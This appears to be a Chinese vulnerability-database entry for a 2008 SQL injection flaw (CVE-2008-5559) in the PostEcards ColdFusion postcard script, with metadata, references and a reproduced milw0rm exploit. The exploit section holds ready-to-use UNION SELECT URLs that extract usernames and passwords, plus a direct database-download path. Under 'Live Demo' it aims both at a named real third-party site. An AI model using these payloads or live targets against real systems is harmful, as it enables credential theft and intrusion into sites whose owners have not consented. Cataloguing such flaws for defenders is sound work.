PostEcards 'sendcard.cfm' SQL注入漏洞

漏洞ID	1116984	漏洞类型	SQL注入
发布时间	2008-12-09	更新时间	2009-03-18
CVE编号	CVE-2008-5559	CNNVD-ID	CNNVD-200812-244
漏洞平台	ASP	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/7398
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-244

|漏洞详情

PostEcards是一个简单的明信片的应用程序，使您可以方便地添加明信片应用到您的网站。PostEcards的sendcard.cfm中存在SQL注入漏洞。远程攻击者可以借助cid参数，执行任意SQL指令。

|漏洞EXP

###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : PostEcards
#download : http://www.funscripts.net/old_coldfusion/download.php?fname=postcards

###########################################################################

#Exploits :

--=[SQL INJECTION]=--
http://www.target.com/sendcard.cfm?cid=0+union+SELECT%20null,null,username,null%20FROM%20USERS%00
http://www.target.com/sendcard.cfm?cid=0+union+SELECT%20null,null,pwd,null%20FROM%20USERS%00


--=[DATABASE DISCLOSURE]=--
http://www.target.com/database/postcards.mdb



#Live Demo
http://www.melink.com/PostCards/database/postcards.mdb
http://www.melink.com/PostCards/sendcard.cfm?cid=0+union+SELECT%20null,null,username,null%20FROM%20USERS%00

#Greetz For

###########################################################################

# milw0rm.com [2008-12-09]

|参考资料

来源:XF
名称:postecards-sendcard-sql-injection(47194)
链接:http://xforce.iss.net/xforce/xfdb/47194
来源:BID
名称:32719
链接:http://www.securityfocus.com/bid/32719
来源:MILW0RM
名称:7398
链接:http://www.milw0rm.com/exploits/7398
来源:SREASON
名称:4725
链接:http://securityreason.com/securityalert/4725
来源:SECUNIA
名称:33067
链接:http://secunia.com/advisories/33067

PostEcards 'sendcard.cfm' SQL注入漏洞

|漏洞来源

|漏洞详情

|漏洞EXP

|参考资料

检索漏洞

相关漏洞